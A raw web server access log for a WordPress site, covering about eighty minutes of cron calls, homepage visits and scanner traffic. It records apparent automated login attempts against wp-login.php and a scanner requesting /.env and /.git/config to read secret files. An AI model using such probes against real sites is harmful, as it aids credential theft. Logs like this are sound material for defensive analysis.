116.193.190.94 - - [06/Sep/2025:16:22:31 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
116.193.190.94 - - [06/Sep/2025:16:22:32 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [06/Sep/2025:16:31:48 +0800] "POST /wp-cron.php?doing_wp_cron=1757147508.3613669872283935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [06/Sep/2025:16:31:49 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [06/Sep/2025:16:37:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757147873.6500079631805419921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:16:37:53 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:16:43:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757148234.1121430397033691406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.172.249.49 - - [06/Sep/2025:16:43:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
42.236.12.196 - - [06/Sep/2025:16:54:51 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [06/Sep/2025:16:55:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757148950.4137470722198486328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
64.23.192.65 - - [06/Sep/2025:16:55:50 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
64.23.192.65 - - [06/Sep/2025:16:55:51 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [06/Sep/2025:17:00:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757149229.2841470241546630859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
113.161.118.234 - - [06/Sep/2025:17:00:29 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
113.161.118.234 - - [06/Sep/2025:17:00:30 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [06/Sep/2025:17:02:43 +0800] "POST /wp-cron.php?doing_wp_cron=1757149362.9992299079895019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [06/Sep/2025:17:03:02 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [06/Sep/2025:17:07:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757149625.4003920555114746093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [06/Sep/2025:17:07:05 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:17:08:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757149716.1040050983428955078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [06/Sep/2025:17:08:36 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:17:11:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757149881.0760259628295898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.216.150.145 - - [06/Sep/2025:17:11:21 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [06/Sep/2025:17:13:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757150035.4349880218505859375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:17:13:55 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:17:17:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757150272.9967730045318603515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.235.207.254 - - [06/Sep/2025:17:17:54 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
64.62.156.212 - - [06/Sep/2025:17:25:18 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:17:25:19 +0800] "POST /wp-cron.php?doing_wp_cron=1757150719.0916600227355957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [06/Sep/2025:17:29:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757150945.6086618900299072265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.183.84 - - [06/Sep/2025:17:29:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.183.84 - - [06/Sep/2025:17:29:07 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [06/Sep/2025:17:41:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757151673.1415278911590576171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
188.166.188.97 - - [06/Sep/2025:17:41:13 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
188.166.188.97 - - [06/Sep/2025:17:41:14 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
